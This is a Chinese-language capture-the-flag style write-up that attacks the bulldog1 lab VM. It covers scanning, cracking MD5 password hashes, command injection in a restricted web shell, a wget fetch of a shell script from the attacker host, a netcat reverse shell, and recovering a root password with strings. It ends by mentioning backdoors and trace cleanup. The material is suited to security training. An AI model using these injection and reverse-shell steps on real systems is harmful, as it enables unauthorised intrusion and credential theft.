渗透测试实战2——bulldog1靶机入侵

一、实验环境

  • 攻击机(Kali):192.168.247.160
  • 靶机(bulldog1):192.168.247.148

二、实验步骤

(一)主动信息收集

1、主机发现

渗透测试实战2——bulldog1靶机入侵_第1张图片

2、端口扫描

渗透测试实战2——bulldog1靶机入侵_第2张图片

3、端口服务版本扫描

渗透测试实战2——bulldog1靶机入侵_第3张图片

(二)Web渗透

http服务(80端口)

1、访问目标主机

渗透测试实战2——bulldog1靶机入侵_第4张图片

没有发现什么有用信息。

2、网站指纹信息扫描(whatweb)

          whatweb 是kali中网站指纹识别的工具,使用Ruby语言开发。whatweb可识别web技术,包括内容管理系统(CMS)、博客平台、统计/分析包、JavaScript库,Web服务器和嵌入式设备等。它有超过900个插件,每个插件都能识别不同的东西。Whatweb还可以识别版本号,电子邮件地址、账户ID、Web框架模块,SQL错误等。

用法: weatweb  域名

  • -i  指定要扫描的文件
  • -v 详细显示扫描的结果
  • -a  指定运行级别

3、目录探测

  • 指定字典扫描
  • dpkg -L dirb
  • dirb http://192.168.247.148 /usr/share/dirb/wordlists/big.txt

渗透测试实战2——bulldog1靶机入侵_第5张图片

渗透测试实战2——bulldog1靶机入侵_第6张图片

  • 使用默认字典扫描

dirb http://192.168.247.148

渗透测试实战2——bulldog1靶机入侵_第7张图片

4、对扫描到的目录挨个进行查看

访问 http://192.168.247.148/admin/,出现一个登录界面。使用弱口令进行登录,失败。

渗透测试实战2——bulldog1靶机入侵_第8张图片

访问 http://192.168.247.148/dev,进入如下界面:

渗透测试实战2——bulldog1靶机入侵_第9张图片

渗透测试实战2——bulldog1靶机入侵_第10张图片

Web-Shell需进行身份认证才能查看,推测里面可能含有重要的信息。

注意到' Web-Shell '下面有一些联系方式,猜测可能存在有用信息,打开源代码进行查看,每个联系方式都对应着一串长字符(有字母和数字组成),猜测可能为MD5加密的密码。访问 https://www.somd5.com/,进行解密。

渗透测试实战2——bulldog1靶机入侵_第11张图片

 只有以下两个联系方式对应的长字符串解密成功

渗透测试实战2——bulldog1靶机入侵_第12张图片

渗透测试实战2——bulldog1靶机入侵_第13张图片

推测可能存在的账号:

  • 用户名:nick                      密码:bulldog
  • 用户名:sarah                   密码:bulldoglover

访问 http://192.168.247.148/admin/,使用以上两个用户分别进行登录。

猜测登录的账号为:nick,密码为bulldog,登录成功(使用邮箱登录失败)

渗透测试实战2——bulldog1靶机入侵_第14张图片

猜测登录的账号为:sarah,密码为bulldoglover,登录成功(使用邮箱登录失败)

渗透测试实战2——bulldog1靶机入侵_第15张图片

进行身份认证后,点击 ' Web-Shell ',可跳转到如下界面。发现给出的webshell只能使用给定的几个命令。

渗透测试实战2——bulldog1靶机入侵_第16张图片

5、尝试命令注入

        可以进行命令注入,尝试wget是否有权限。

        攻击机kali执行命令 ' python -m SimpleHTTPServer 80 '搭建简易web服务。在webshell上执行命令 ' ls & wget http://192.168.247.160 ',发现命令执行成功。

渗透测试实战2——bulldog1靶机入侵_第17张图片

        接下来我们可以利用命令注入漏洞,在测试机Kali上写一个shell.py脚本,并将其上传到靶机上,使其执行,从而获得一个反弹shell。

在Kali测试机的 /var/www/html 目录下(开启python web服务)准备一个脚本shell.py。

渗透测试实战2——bulldog1靶机入侵_第18张图片

在命令执行页面执行 ' pwd & wget http://192.168.247.160/shell.py ',本地日志显示成功下载。

渗透测试实战2——bulldog1靶机入侵_第19张图片

 在命令执行页面执行 ' ls ',可以看到shell.py。

渗透测试实战2——bulldog1靶机入侵_第20张图片

在测试机Kali上进行端口监听,执行 ' nc -vlnp 1234 ',然后在命令执行页面执行命令 'pwd & python shell.py',即可成功获得shell。

渗透测试实战2——bulldog1靶机入侵_第21张图片

6、提升权限并且获得flag

查看有哪些系统用户 cat /etc/passwd, 发现需要关注的用户有:bulldogadmin、django

渗透测试实战2——bulldog1靶机入侵_第22张图片

进入/home目录,查看是否有其他用户,进入bulldogadmin

渗透测试实战2——bulldog1靶机入侵_第23张图片

查看当前目录下的所有文件的详细信息,意外发现一个隐藏目录 .hiddenadmindirectory

渗透测试实战2——bulldog1靶机入侵_第24张图片

该隐藏目录存在两个文件,一个note提示,一个可执行文件

渗透测试实战2——bulldog1靶机入侵_第25张图片

利用 strings 查看可执行文件中的字符

渗透测试实战2——bulldog1靶机入侵_第26张图片

SUPER、 ulitimate、PASSWORD、youCANTget,这些都与最高权限账号相关, 猜测可能是密码。把他们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是混淆视听的,还好认识PASSWORD,我们查看一下

渗透测试实战2——bulldog1靶机入侵_第27张图片

  • 用户名:django
  • 密码:SUPERultimatePASSWORDyouCANTget

之后要做的就是留后门,清理痕迹了。。。

你可能感兴趣的:(Kali渗透测试,渗透测试)